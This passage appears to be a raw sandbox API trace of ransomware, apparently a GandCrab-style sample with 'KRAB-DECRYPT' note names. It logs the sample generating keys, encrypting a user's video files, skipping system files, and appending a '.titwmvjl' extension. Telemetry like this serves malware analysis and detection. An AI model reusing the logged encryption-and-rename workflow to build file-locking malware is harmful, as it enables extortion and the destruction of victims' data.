dwFlags=0x0) returned 1 [0095.694] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.694] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.695] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.695] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.695] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.695] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0095.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.695] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.695] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.696] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.696] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503778) returned 1 [0095.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.696] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.696] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.697] GetLastError () returned 0x0 [0095.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.697] CryptDestroyKey (hKey=0x503778) returned 1 [0095.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.697] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.697] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.698] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503338) returned 1 [0095.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.698] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.698] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.698] GetLastError () returned 0x0 [0095.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.698] CryptDestroyKey (hKey=0x503338) returned 1 [0095.699] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.699] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.699] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.699] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.699] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0xebce, lpOverlapped=0x0) returned 1 [0095.711] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffff1432, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.711] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xebce, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0xebce, lpOverlapped=0x0) returned 1 [0095.712] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.712] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0095.713] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.717] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.717] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.717] CloseHandle (hObject=0x2d4) returned 1 [0095.718] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\hm005b.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\hM005B.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\hm005b.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0095.719] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.719] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.719] lstrcmpW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2=".") returned 1 [0095.719] lstrcmpW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="..") returned 1 [0095.719] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="lAlb8NgT1Hf h_.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv" [0095.719] lstrlenW (lpString=".titwmvjl") returned 9 [0095.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv") returned 119 [0095.719] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.719] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv.titwmvjl") returned 128 [0095.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv") returned 119 [0095.719] lstrlenW (lpString=".mkv") returned 4 [0095.719] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.719] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0095.719] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0095.720] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.720] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv") returned 119 [0095.720] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv") returned 119 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="desktop.ini") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="autorun.inf") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="ntuser.dat") returned -1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="iconcache.db") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="bootsect.bak") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="boot.ini") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="ntuser.dat.log") returned -1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="thumbs.db") returned -1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="ntldr") returned -1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="NTDETECT.COM") returned -1 [0095.720] lstrcmpiW (lpString1="lAlb8NgT1Hf h_.mkv", lpString2="Bootfont.bin") returned 1 [0095.720] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv") returned 119 [0095.720] lstrlenW (lpString=".mkv") returned 4 [0095.720] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.720] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0095.720] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.720] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.721] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\lalb8ngt1hf h_.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0095.721] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.721] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0095.722] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.722] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.722] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.722] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.723] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.723] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.723] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0095.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.723] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.723] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.723] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.724] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.724] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.724] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.724] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0095.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.724] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.724] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.724] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.725] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0095.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.725] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.725] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.725] GetLastError () returned 0x0 [0095.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.726] CryptDestroyKey (hKey=0x503578) returned 1 [0095.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.726] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.726] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.726] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5038f8) returned 1 [0095.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.727] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.727] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.727] GetLastError () returned 0x0 [0095.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.727] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.727] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.727] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.727] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.728] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x1016e, lpOverlapped=0x0) returned 1 [0095.741] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffefe92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.741] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1016e, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x1016e, lpOverlapped=0x0) returned 1 [0095.743] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.743] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0095.744] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.747] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.748] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.748] CloseHandle (hObject=0x2d4) returned 1 [0095.748] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\lalb8ngt1hf h_.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\lAlb8NgT1Hf h_.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\lalb8ngt1hf h_.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0095.749] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.749] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.749] lstrcmpW (lpString1="rHtdv.mp4", lpString2=".") returned 1 [0095.749] lstrcmpW (lpString1="rHtdv.mp4", lpString2="..") returned 1 [0095.749] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="rHtdv.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4" [0095.749] lstrlenW (lpString=".titwmvjl") returned 9 [0095.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4") returned 110 [0095.749] VirtualAlloc (lpAddress=0x0, dwSize=0x11c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.749] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4.titwmvjl") returned 119 [0095.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4") returned 110 [0095.750] lstrlenW (lpString=".mp4") returned 4 [0095.750] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.750] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0095.750] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0095.750] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4") returned 110 [0095.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4") returned 110 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="desktop.ini") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="autorun.inf") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="ntuser.dat") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="iconcache.db") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="bootsect.bak") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="boot.ini") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="ntuser.dat.log") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="thumbs.db") returned -1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="CRAB-DECRYPT.html") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="ntldr") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="NTDETECT.COM") returned 1 [0095.750] lstrcmpiW (lpString1="rHtdv.mp4", lpString2="Bootfont.bin") returned 1 [0095.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4") returned 110 [0095.750] lstrlenW (lpString=".mp4") returned 4 [0095.750] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.751] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0095.751] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.751] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.751] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\rhtdv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0095.751] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.751] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0095.752] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, 